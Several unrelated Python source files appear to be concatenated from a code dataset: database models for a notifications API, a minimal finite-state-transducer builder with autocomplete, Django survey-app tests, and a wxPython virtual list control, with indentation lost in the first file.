UUID(as_uuid=True), db.ForeignKey("jobs.id"), index=True, unique=False
)
job = db.relationship("Job")
job_row_number = db.Column(db.Integer, nullable=True)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), unique=False
)
service = db.relationship("Service")
template_id = db.Column(UUID(as_uuid=True), unique=False)
template_version = db.Column(db.Integer, nullable=False)
api_key_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("api_keys.id"), unique=False
)
api_key = db.relationship("ApiKey")
key_type = db.Column(
db.String, db.ForeignKey("key_types.name"), unique=False, nullable=False
)
billable_units = db.Column(db.Integer, nullable=False, default=0)
notification_type = db.Column(notification_types, nullable=False)
created_at = db.Column(db.DateTime, unique=False, nullable=False)
sent_at = db.Column(db.DateTime, index=False, unique=False, nullable=True)
sent_by = db.Column(db.String, nullable=True)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
status = db.Column(
"notification_status",
db.Text,
db.ForeignKey("notification_status_types.name"),
nullable=True,
default="created",
key="status", # http://docs.sqlalchemy.org/en/latest/core/metadata.html#sqlalchemy.schema.Column
)
reference = db.Column(db.String, nullable=True, index=True)
client_reference = db.Column(db.String, nullable=True)
international = db.Column(db.Boolean, nullable=True, default=False)
phone_prefix = db.Column(db.String, nullable=True)
rate_multiplier = db.Column(db.Numeric(asdecimal=False), nullable=True)
created_by_id = db.Column(UUID(as_uuid=True), nullable=True)
document_download_count = db.Column(db.Integer, nullable=True)
__table_args__ = (
db.ForeignKeyConstraint(
["template_id", "template_version"],
["templates_history.id", "templates_history.version"],
),
Index(
"ix_notification_history_service_id_composite",
"service_id",
"key_type",
"notification_type",
"created_at",
),
)
@classmethod
def from_original(cls, notification):
history = super().from_original(notification)
history.status = notification.status
return history
def update_from_original(self, original):
super().update_from_original(original)
self.status = original.status
INVITE_PENDING = "pending"
INVITE_ACCEPTED = "accepted"
INVITE_CANCELLED = "cancelled"
INVITED_USER_STATUS_TYPES = [INVITE_PENDING, INVITE_ACCEPTED, INVITE_CANCELLED]
class InviteStatusType(db.Model):
__tablename__ = "invite_status_type"
name = db.Column(db.String, primary_key=True)
class InvitedUser(db.Model):
__tablename__ = "invited_users"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
email_address = db.Column(db.String(255), nullable=False)
user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
from_user = db.relationship("User")
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, unique=False
)
service = db.relationship("Service")
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
status = db.Column(
db.Enum(*INVITED_USER_STATUS_TYPES, name="invited_users_status_types"),
nullable=False,
default=INVITE_PENDING,
)
permissions = db.Column(db.String, nullable=False)
auth_type = db.Column(
db.String,
db.ForeignKey("auth_type.name"),
index=True,
nullable=False,
default=SMS_AUTH_TYPE,
)
folder_permissions = db.Column(JSONB(none_as_null=True), nullable=False, default=[])
# would like to have used properties for this but haven't found a way to make them
# play nice with marshmallow yet
def get_permissions(self):
return self.permissions.split(",")
class InvitedOrganizationUser(db.Model):
__tablename__ = "invited_organization_users"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
email_address = db.Column(db.String(255), nullable=False)
invited_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=False
)
invited_by = db.relationship("User")
organization_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("organization.id"), nullable=False
)
organization = db.relationship("Organization")
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
status = db.Column(
db.String,
db.ForeignKey("invite_status_type.name"),
nullable=False,
default=INVITE_PENDING,
)
def serialize(self):
return {
"id": str(self.id),
"email_address": self.email_address,
"invited_by": str(self.invited_by_id),
"organization": str(self.organization_id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"status": self.status,
}
# Service Permissions
MANAGE_USERS = "manage_users"
MANAGE_TEMPLATES = "manage_templates"
MANAGE_SETTINGS = "manage_settings"
SEND_TEXTS = "send_texts"
SEND_EMAILS = "send_emails"
MANAGE_API_KEYS = "manage_api_keys"
PLATFORM_ADMIN = "platform_admin"
VIEW_ACTIVITY = "view_activity"
# List of permissions
PERMISSION_LIST = [
MANAGE_USERS,
MANAGE_TEMPLATES,
MANAGE_SETTINGS,
SEND_TEXTS,
SEND_EMAILS,
MANAGE_API_KEYS,
PLATFORM_ADMIN,
VIEW_ACTIVITY,
]
class Permission(db.Model):
__tablename__ = "permissions"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
    # Service id is optional; if the service is omitted, we assume the
    # permission is not service-specific.
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
unique=False,
nullable=True,
)
service = db.relationship("Service")
user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
user = db.relationship("User")
permission = db.Column(
db.Enum(*PERMISSION_LIST, name="permission_types"),
index=False,
unique=False,
nullable=False,
)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
__table_args__ = (
UniqueConstraint(
"service_id", "user_id", "permission", name="uix_service_user_permission"
),
)
class Event(db.Model):
__tablename__ = "events"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
event_type = db.Column(db.String(255), nullable=False)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
data = db.Column(JSON, nullable=False)
class Rate(db.Model):
__tablename__ = "rates"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
valid_from = db.Column(db.DateTime, nullable=False)
rate = db.Column(db.Float(asdecimal=False), nullable=False)
notification_type = db.Column(notification_types, index=True, nullable=False)
    def __str__(self):
        return "{} {} {}".format(self.rate, self.notification_type, self.valid_from)
class InboundSms(db.Model):
__tablename__ = "inbound_sms"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="inbound_sms")
    notify_number = db.Column(
        db.String, nullable=False
    )  # the service's number that the message was sent to
    user_number = db.Column(
        db.String, nullable=False, index=True
    )  # the end user's number that the message was sent from
provider_date = db.Column(db.DateTime)
provider_reference = db.Column(db.String)
provider = db.Column(db.String, nullable=False)
_content = db.Column("content", db.String, nullable=False)
@property
def content(self):
return encryption.decrypt(self._content)
@content.setter
def content(self, content):
self._content = encryption.encrypt(content)
def serialize(self):
return {
"id": str(self.id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"service_id": str(self.service_id),
"notify_number": self.notify_number,
"user_number": self.user_number,
"content": self.content,
}
class InboundSmsHistory(db.Model, HistoryModel):
__tablename__ = "inbound_sms_history"
id = db.Column(UUID(as_uuid=True), primary_key=True)
created_at = db.Column(db.DateTime, index=True, unique=False, nullable=False)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, unique=False
)
service = db.relationship("Service")
notify_number = db.Column(db.String, nullable=False)
provider_date = db.Column(db.DateTime)
provider_reference = db.Column(db.String)
provider = db.Column(db.String, nullable=False)
class ServiceEmailReplyTo(db.Model):
__tablename__ = "service_email_reply_to"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
service = db.relationship(Service, backref=db.backref("reply_to_email_addresses"))
email_address = db.Column(db.Text, nullable=False, index=False, unique=False)
is_default = db.Column(db.Boolean, nullable=False, default=True)
archived = db.Column(db.Boolean, nullable=False, default=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"email_address": self.email_address,
"is_default": self.is_default,
"archived": self.archived,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class AuthType(db.Model):
__tablename__ = "auth_type"
name = db.Column(db.String, primary_key=True)
class FactBilling(db.Model):
__tablename__ = "ft_billing"
local_date = db.Column(db.Date, nullable=False, primary_key=True, index=True)
template_id = db.Column(
UUID(as_uuid=True), nullable=False, primary_key=True, index=True
)
service_id = db.Column(
UUID(as_uuid=True), nullable=False, primary_key=True, index=True
)
notification_type = db.Column(db.Text, nullable=False, primary_key=True)
provider = db.Column(db.Text, nullable=False, primary_key=True)
rate_multiplier = db.Column(db.Integer(), nullable=False, primary_key=True)
international = db.Column(db.Boolean, nullable=False, primary_key=True)
rate = db.Column(db.Numeric(), nullable=False, primary_key=True)
billable_units = db.Column(db.Integer(), nullable=True)
notifications_sent = db.Column(db.Integer(), nullable=True)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
class FactNotificationStatus(db.Model):
__tablename__ = "ft_notification_status"
local_date = db.Column(db.Date, index=True, primary_key=True, nullable=False)
template_id = db.Column(
UUID(as_uuid=True), primary_key=True, index=True, nullable=False
)
service_id = db.Column(
UUID(as_uuid=True),
primary_key=True,
index=True,
nullable=False,
)
job_id = db.Column(UUID(as_uuid=True), primary_key=True, index=True, nullable=False)
notification_type = db.Column(db.Text, primary_key=True, nullable=False)
key_type = db.Column(db.Text, primary_key=True, nullable=False)
notification_status = db.Column(db.Text, primary_key=True, nullable=False)
notification_count = db.Column(db.Integer(), nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
class FactProcessingTime(db.Model):
__tablename__ = "ft_processing_time"
local_date = db.Column(db.Date, index=True, primary_key=True, nullable=False)
messages_total = db.Column(db.Integer(), nullable=False)
messages_within_10_secs = db.Column(db.Integer(), nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
class Complaint(db.Model):
__tablename__ = "complaints"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
notification_id = db.Column(UUID(as_uuid=True), index=True, nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
service = db.relationship(Service, backref=db.backref("complaints"))
ses_feedback_id = db.Column(db.Text, nullable=True)
complaint_type = db.Column(db.Text, nullable=True)
complaint_date = db.Column(db.DateTime, nullable=True)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
def serialize(self):
return {
"id": str(self.id),
"notification_id": str(self.notification_id),
"service_id": str(self.service_id),
"service_name": self.service.name,
"ses_feedback_id": str(self.ses_feedback_id),
"complaint_type": self.complaint_type,
"complaint_date": get_dt_string_or_none(self.complaint_date),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
}
class ServiceDataRetention(db.Model):
__tablename__ = "service_data_retention"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
service = db.relationship(
Service,
backref=db.backref(
"data_retention",
collection_class=attribute_mapped_collection("notification_type"),
),
)
notification_type = db.Column(notification_types, nullable=False)
days_of_retention = db.Column(db.Integer, nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
__table_args__ = (
UniqueConstraint(
"service_id", "notification_type", name="uix_service_data_retention"
),
)
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"service_name": self.service.name,
"notification_type": self.notification_type,
"days_of_retention": self.days_of_retention,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class WebauthnCredential(db.Model):
"""
A table that stores data for registered webauthn credentials.
"""
__tablename__ = "webauthn_credential"
id = db.Column(
UUID(as_uuid=True), primary_key=True, nullable=False, default=uuid.uuid4
)
user_id = db.Column(UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=False)
user = db.relationship(User, backref=db.backref("webauthn_credentials"))
name = db.Column(db.String, nullable=False)
# base64 encoded CBOR. used for logging in. https://w3c.github.io/webauthn/#sctn-attested-credential-data
credential_data = db.Column(db.String, nullable=False)
# base64 encoded CBOR. used for auditing. https://www.w3.org/TR/webauthn-2/#authenticatorattestationresponse
registration_response = db.Column(db.String, nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def serialize(self):
return {
"id": str(self.id),
"user_id": str(self.user_id),
"name": self.name,
"credential_data": self.credential_data,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class Agreement(db.Model):
__tablename__ = "agreements"
id = db.Column(
UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=False
)
type = db.Column(db.String(3), nullable=False, unique=True, index=True)
partner_name = db.Column(db.String(255), nullable=False, unique=True, index=True)
status = db.Column(db.String(255), nullable=False, unique=True, index=True)
start_time = db.Column(db.DateTime, nullable=True)
end_time = db.Column(db.DateTime, nullable=True)
url = db.Column(db.String(255), nullable=False, unique=True, index=True)
budget_amount = db.Column(db.Float, nullable=True)
organization_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("organization.id"),
nullable=True,
)
def serialize(self):
return {
"id": str(self.id),
"type": self.type,
"partner_name": self.partner_name,
"status": self.status,
"start_time": self.start_time.strftime(DATETIME_FORMAT),
"end_time": self.end_time.strftime(DATETIME_FORMAT),
"budget_amount": self.budget_amount,
"organization_id": self.organization_id,
}
| GSA/notifications-api | app/models.py | models.py | py | 78,608 | python | en | code | 7 | github-code | 13 |
37031745149 | import networkx as nx
from fst.classes import State
from fst.utils import findMaxWordSize, findMinimizedState
def create_minimal_transducer(dictionary):
# Initial
fst = nx.MultiDiGraph()
minimal_states = []
max_word_size = findMaxWordSize(dictionary)
# print(max_word_size)
temp_states = []
for i in range(0, max_word_size + 1):
temp_state = State(i)
temp_states.append(temp_state)
# Algorithm
prev_word = ""
current_word = ""
index = 1
for word in dictionary:
current_word = word
# print(current_word)
# Longest Prefix
prefix_len = 0
while (prefix_len < len(current_word) and prefix_len < len(prev_word) and prev_word[prefix_len] == current_word[prefix_len]):
prefix_len = prefix_len + 1
# Minimize States from Suffix of the Previous Word
for i in range(len(prev_word), prefix_len, -1):
cur_output = temp_states[i-1].output(temp_states[i].name)
# print(cur_output)
temp_states[i-1].remove_edge(temp_states[i].name, prev_word[i-1])
temp_states[i-1].add_edge(findMinimizedState(temp_states[i],
minimal_states, max_word_size).name, prev_word[i-1], cur_output)
temp_states[i].clear()
# Initializes Tail States for the Current Word
for i in range(prefix_len, len(current_word)):
temp_states[i].add_edge(temp_states[i+1].name, current_word[i])
if current_word != prev_word:
temp_states[len(current_word)].set_final(True)
# Fixing Outputs
missing_output = index
for i in range(0, prefix_len+1):
# print(missing_output)
if i == prefix_len:
temp_states[i].set_output(
temp_states[i+1].name, missing_output)
break
cur_output = temp_states[i].output(temp_states[i+1].name)
# print(cur_output)
new_output = min(missing_output, cur_output)
# print(new_output)
temp_states[i].set_output(temp_states[i+1].name, new_output)
dif_output = cur_output - new_output
temp_states[i+1].correct_edges(dif_output)
missing_output = missing_output - new_output
prev_word = current_word
index = index + 1
# Minimizing States for Last Word
for i in range(len(current_word), 0, -1):
cur_output = temp_states[i-1].output(temp_states[i].name)
temp_states[i-1].remove_edge(temp_states[i].name, current_word[i-1])
temp_states[i-1].add_edge(findMinimizedState(temp_states[i],
minimal_states, max_word_size).name, current_word[i-1], cur_output)
temp_states[i].clear()
# Adding starting state
new_state = temp_states[0].copy()
new_state.rename(0)
minimal_states.append(new_state)
# Creating FST based on list
    # Debug: dump the minimal states and their edges
    # for stat in minimal_states:
    #     print("State: {}, Final: {}, Edges: {}".format(stat.name, stat.final, len(stat.edges)))
    #     for edge in stat.edges:
    #         print("Origin: {}, Destination: {}, Transition: {}, Output: {}".format(edge.origin, edge.destiny, edge.transition, edge.output))
for state in minimal_states:
state.add_state_to_fst(fst)
for state in minimal_states:
state.add_edges_to_fst(fst)
return fst
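# Illustrative usage (a sketch): the construction assumes `dictionary` is a
# lexicographically sorted list of words, and the resulting transducer
# appears to map each word to its 1-based position in that list:
#     words = sorted(["apply", "apple", "banana"])
#     fst = create_minimal_transducer(words)
#     read_input_fst("apply", fst)   # -> position of "apply" in `words`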
# Read Input
def read_input_fst(input, fst):
state = 0
output = 0
for letter in input:
current_state_edges = dict(fst[state])
prev_state = state
for next_state, edge_properties in current_state_edges.items():
for index, edge in edge_properties.items():
if edge['transition'] == letter:
state = next_state
output += edge['output']
break
        if state == prev_state:
            print("Did not reach the end of the input")
            break
return output
def auto_complete_fst(input, fst):
state = 0
for letter in input:
current_state_edges = dict(fst[state])
prev_state = state
for next_state, edge_properties in current_state_edges.items():
for index, edge in edge_properties.items():
if edge['transition'] == letter:
state = next_state
break
        if state == prev_state:
            return "Does not exist"
# print(state)
queue = [(state, input)]
autocomplete_list = []
while len(queue) > 0 and len(autocomplete_list) < 5:
current_pair = queue.pop(0)
current_state = current_pair[0]
# print("Atual:{}".format(current_state))
# Adding final words to autocomplete_list
if fst.nodes[current_state]["final"]:
autocomplete_list.append(current_pair[1])
# Adding New States to BFS
current_state_edges = dict(fst[current_state])
for next_state, edge_properties in current_state_edges.items():
for index, edge in edge_properties.items():
# print("Proximo:{}".format(next_state))
queue.append((next_state, current_pair[1]+edge['transition']))
return autocomplete_list
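# Sketch: because the traversal above is a BFS from the prefix state, the
# (at most five) completions come back shortest-first, e.g.:
#     auto_complete_fst("app", fst)   # -> up to five words starting with "app"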
def read_fst():
    # NOTE: nx.read_gpickle was removed in NetworkX 3.0; on newer versions,
    # load the pickled graph with the standard `pickle` module instead.
    fst = nx.read_gpickle("generated_fst")
    return fst
| RafaelStudartDiPiero/FST_CTC34 | fst/fst.py | fst.py | py | 5,327 | python | en | code | 0 | github-code | 13 |
22907058374 | from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from survey.tests.utils import SurveyTestCase
from survey.models import (DesiredFact, FactOption,
Fact, has_required_data, Project)
class DesiredFactTests(TestCase):
def setUp(self):
self.content_type = ContentType.objects.all()[0]
self.desired_fact = DesiredFact.objects.create(code='code1',
label='enter data', data_type='T',
required=True, content_type=self.content_type)
def test_choices(self):
FactOption.objects.create(code='1', description='a',
desired_fact=self.desired_fact)
FactOption.objects.create(code='2', description='b',
desired_fact=self.desired_fact)
self.assertEquals([('1', '1-a'), ('2', '2-b')],
self.desired_fact.choices[1:])
class FactTests(SurveyTestCase):
def setUp(self):
super(FactTests, self).setUp()
self.login()
def _set_desired_fact_data_type(self, _type):
self.desired_fact.data_type = _type
self.desired_fact.save()
def test_data_type_text(self):
data = 'hi there'
self._set_desired_fact_data_type('T')
fact = self._save_fact(data)
self.assertEquals(data, fact.typed_data)
def test_data_type_int(self):
data = '12'
self._set_desired_fact_data_type('I')
fact = self._save_fact(data)
self.assertEquals(12, fact.typed_data)
def test_data_type_float(self):
data = '12.2'
self._set_desired_fact_data_type('F')
fact = self._save_fact(data)
self.assertEquals(12.2, fact.typed_data)
def test_data_type_yes_no(self):
data = '01'
self._set_desired_fact_data_type('Y')
fact = self._save_fact(data)
self.assertEquals(True, fact.typed_data)
def test_data_type_select(self):
fo = FactOption.objects.create(desired_fact=self.desired_fact, code='12')
data = '12'
self._set_desired_fact_data_type('S')
fact = self._save_fact(data)
self.assertEquals(fo, fact.typed_data)
def test_existing_facts(self):
self._save_fact('01')
existing_facts = dict(Fact.existing_facts(self.survey, self.subject).items())
self.assertEquals({'code1': '01'}, existing_facts)
def test_existing_facts_with_prefix(self):
self._save_fact('01')
existing_facts = dict(Fact.existing_facts(
self.survey, self.subject, 'prefix').items())
self.assertEquals({'prefix-code1': '01'}, existing_facts)
class SubjectTests(SurveyTestCase):
def setUp(self):
super(SubjectTests, self).setUp()
self.login()
def test_survey_with_no_desired_facts(self):
self.desired_fact.delete()
self.assertTrue(has_required_data(self.survey, self.subject))
def test_survey_with_non_required_data(self):
self.desired_fact.required = False
self.desired_fact.save()
self.assertTrue(has_required_data(self.survey, self.subject))
def test_survey_with_required_data(self):
self.assertFalse(has_required_data(self.survey, self.subject))
Fact.objects.create(survey=self.survey, subject=self.subject,
desired_fact=self.desired_fact, data='1', created_by=self.user,
updated_by=self.user)
self.assertTrue(has_required_data(self.survey, self.subject))
def test_survey_with_mixed_data(self):
DesiredFact.objects.create(code='code2',
label='enter data', data_type='T',
required=False, content_type=self.content_type)
self.assertFalse(has_required_data(self.survey, self.subject))
Fact.objects.create(survey=self.survey, subject=self.subject,
desired_fact=self.desired_fact, data='1', created_by=self.user,
updated_by=self.user)
self.assertTrue(has_required_data(self.survey, self.subject))
class SurveyTests(SurveyTestCase):
def test_survey_content_types(self):
self.assertEquals(
[ContentType.objects.get_for_model(Project)],
self.survey.content_types())
| gareth-lloyd/flexsurvey | survey/tests/test_models.py | test_models.py | py | 4,220 | python | en | code | 0 | github-code | 13 |
41858059866 | class Node:
def __init__(self, cords, reward):
self.type = 'normal'
self.cords = cords
self.is_wall = False
self.is_door = False
self.door = ''
self.key = ''
self.diamond = ''
self.is_wired = False
        # v / r / pi presumably follow standard RL naming: value, reward, policy
        self.v = 0
        self.r = reward
        self.pi = 0
self.available = True
| msmsd778/AI_Game_RL | src/python_client/MainClass.py | MainClass.py | py | 377 | python | en | code | 0 | github-code | 13 |
22139695329 | import turtle
a = 10
x = 0
y = 0
turtle.shape('turtle')
# Draw 10 concentric squares, each 10 px larger than the last
for i in range(10):
for j in range(4):
turtle.forward(a)
turtle.left(90)
turtle.penup()
a += 10
x -= 5
y -= 5
turtle.goto(x, y)
turtle.pendown()
| Andrey-phystech/mipt_python_1sem | lab_1/ex5.py | ex5.py | py | 262 | python | en | code | 0 | github-code | 13 |
31728286520 | """
Animation module, including spritesheet
and animation frame classes
Written Dec 29, 2015 by Benjamin Reed
Credit for original spritesheet implementation
goes to Paul Vincent Craven at
programarcadegames.com
"""
import pygame as pyg
import constants as con
class RectWithType(pyg.Rect):
"""
Class representing a collision rect with
a type flag defining what kind of collision
it is used for.
Type flag legend:
'Sprite' : Sprite/surface collision
'Vuln' : Attack vulnerability region ("hurtbox")
'Atk' : Attack collision region ("hitbox")
"""
    def __init__(self, rect):
        # `rect` is a 5-tuple: (type_flag, x, y, width, height)
        super(RectWithType, self).__init__(rect[1], rect[2], rect[3], rect[4])
        self.type = rect[0]
def flip_horizontal(self, frame_width):
"""
Horizontally reflects rect location within
frame coordinate system along line (x=frame_width/2)
"""
# Calculate flipping axis as frame median
flip_axis = frame_width/2
# Determine whether or not rect overlaps the
# flipping axis
# If it does, calculate distance from axis
# to right edge and reassign rect x-origin
# to axis minus that distance
if flip_axis in range (self.x, self.right+1):
offset = self.right - flip_axis
self.x = flip_axis - offset
# If no overlap, determine if rect lies to
# the left or the right of the axis
else:
if self.right < flip_axis:
offset = flip_axis - self.right
self.x = flip_axis + offset
elif self.x > flip_axis:
offset = self.x - flip_axis
self.right = flip_axis - offset
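# Worked example for flip_horizontal (illustrative numbers): with
# frame_width = 100 the flipping axis is x = 50. A rect spanning
# x = 10..30 mirrors to x = 70..90, and a rect spanning x = 40..60
# straddles the axis and maps onto itself, since reflecting about
# x = 50 simply swaps its two edges.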
class AnimationFrame(pyg.sprite.Sprite):
"""
Class representing a frame of animation
and its associated collision rects
    (Alternate implementation: has multiple
    lists of rects separated by type flag.
    The idea is to minimize the number of
    rects you have to iterate through per
    frame and/or event to check for different
    types of collision.)
    """
def __init__(self, name, axis, image, rects):
"""
Constructs an AnimationFrame from the
image + RectWithType data passed in
"""
super(AnimationFrame, self).__init__()
self.image = image
self.axis = axis
# Total frame dimensions -- used to determine
# drawing coordinates
self.rect = self.image.get_rect()
self.rect.x = 50
self.rect.y = 50
self.name = name
self.vuln_rects = []
self.atk_rects = []
# Sprite rect is always the first rect
# member following the frame's name
# There is ONLY ever one sprite rect
# per frame (I think; this may change)
self.sprite_rect = rects[0]
# Remaining rects are added to different
# lists based on their type flag
for x in range (1, len(rects)):
if rects[x].type == "Vuln":
self.vuln_rects.append(rects[x])
elif rects[x].type == "Atk":
self.atk_rects.append(rects[x])
class SpriteSheet(object):
"""
Class used to grab images out of a sprite sheet.
"""
def __init__(self, file_name):
"""
Construct a SpriteSheet from image at file
path (file_name) and convert
"""
self.sprite_sheet = pyg.image.load(file_name).convert()
def get_image(self, x, y, width, height):
"""
Grab a single image out of the sprite_sheet image
Parameters: (x,y) for origin of frame you wish to
slice, and (width, height) for the dimensions of
your desired slice
"""
image = pyg.Surface([width, height]).convert()
image.blit(self.sprite_sheet, (0,0), (x, y, width, height))
# Set transparency color key
image.set_colorkey(con.ALPHA_COLOR)
return image | benreed/pyg-fg-hello-rect-collision | animation.py | animation.py | py | 4,130 | python | en | code | 0 | github-code | 13 |
6669293011 | import json
from jupyter_server.base.handlers import APIHandler
from jupyter_server.utils import url_path_join
import tornado
import os
class RouteHandler(APIHandler):
# The following decorator should be present on all verb methods (head, get, post,
# patch, put, delete, options) to ensure only authorized user can request the
# Jupyter server
@tornado.web.authenticated
def get(self):
course = os.environ.get('COURSE', 'NO COURSE')
user = os.environ.get('JUPYTERHUB_USER', 'NOBODY')
self.finish(json.dumps({
'course': course,
'user': user,
}))
def setup_handlers(web_app):
host_pattern = ".*$"
base_url = web_app.settings["base_url"]
route_pattern = url_path_join(base_url, "csci-env", "get_env")
handlers = [(route_pattern, RouteHandler)]
web_app.add_handlers(host_pattern, handlers)
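
# Hedged sketch (added; not part of the original file): a Jupyter Server
# extension usually also defines a loader such as the one below, which the
# server invokes with the running ServerApp so the handler above is registered.
#
# def _load_jupyter_server_extension(server_app):
#     setup_handlers(server_app.web_app)
#     server_app.log.info("csci_env server extension loaded")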
| csci-env/env-extension | csci_env/handlers.py | handlers.py | py | 888 | python | en | code | 0 | github-code | 13 |
35024601841 | import os
import re
# Set the path to the input file
input_file = "dr-glas.txt"
# Create a directory to store the output files
output_dir = "dr_glas/kapitel"
os.makedirs(output_dir, exist_ok=True)
reg = r'([0-9]{1,2}\s(?:juni|juli|augusti|september|oktober).*)\n\n'  # raw string so the regex escapes are not mangled
# Open the input file and read the contents
with open(input_file, "r") as f:
file = f.read()
entries = re.split(reg, file)
entry_array = []
for i, entry in enumerate(entries):
    if i % 2:
        # stop if a date header has no following text
        # (the original guard `i == len(entries)` could never trigger)
        if i + 1 >= len(entries):
            break
        entry_array.append((entries[i].strip().strip("."), entries[i + 1]))
# Iterate over the entries and write each one to a separate file
for entry in entry_array:
output_file = os.path.join(output_dir, f"{entry[0]}.txt")
with open(output_file, "w") as f:
f.write(entry[1])
| joelfalk1/doktor-glas | scripts/date_separator.py | date_separator.py | py | 817 | python | en | code | 0 | github-code | 13 |
74087812179 | # CRISTIAN ECHEVERRÍA RABÍ
import weakref
import wx
from wx.lib.newevent import NewEvent
#-----------------------------------------------------------------------------------------
__all__ = ['ListCtrl', 'LISTCTRL_DEF_STYLE', 'EVTC_LISTCTRL_DATACHANGE']
#-----------------------------------------------------------------------------------------
myEvent, EVTC_LISTCTRL_DATACHANGE = NewEvent()
LISTCTRL_DEF_STYLE = wx.LC_VRULES|wx.LC_SINGLE_SEL
#-----------------------------------------------------------------------------------------
class ListCtrl(wx.ListCtrl):
def __init__(self, parent, headers, size=(-1,-1), style=LISTCTRL_DEF_STYLE):
"""
headers : Headers objects list
size : ListCtrl size
style : ListCtrl styles
"""
style = wx.LC_VIRTUAL|wx.LC_REPORT|style
wx.ListCtrl.__init__(self, parent, -1, size=size, style=style)
self.SetImageList(wx.ImageList(1, 1))
ctrl = weakref.proxy(self)
for i, header in enumerate(headers):
header.insert(i, ctrl)
self.headers = headers
self.attrs = [None, None]
self._selected = None
self._currentSort = None
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self._onItemSelected, self)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self._onItemActivated, self)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self._onItemDeselected, self)
self.Bind(wx.EVT_LIST_COL_CLICK, self._onColClick, self)
#-------------------------------------------------------------------------------------
    # Overridden methods
def SetImageList(self, imageList, which=wx.IMAGE_LIST_SMALL):
        # SetImageList is overridden to keep a reference to the image list
self._imageList = imageList
wx.ListCtrl.SetImageList(self, self._imageList, which)
    # Customizable methods of the virtual list
def OnGetItemText(self, row, col):
return self._data.toString(row, self.headers[col])
def OnGetItemImage(self, row):
return -1
def OnGetItemAttr(self, row):
return self.attrs[row % 2]
#-------------------------------------------------------------------------------------
    # Public methods
def SortByCol(self, col=None):
        # Does not modify _currentSort
        # If col is None, the last sort is repeated
if col is None:
col = self._currentSort
if not(col is None):
self._data.sortByHeader(self.headers[col])
self.UpdateView()
def UpdateView(self):
""" Normalmente este método no requiere sobreescritura
"""
nr = len(self._data)
self.SetItemCount(nr)
if nr <=0:
self.selection = None
else:
ini = self.GetTopItem()
fin = ini + 1 + self.GetCountPerPage()
self.RefreshItems(ini, fin)
if self.selection is None:
self.selection = 0
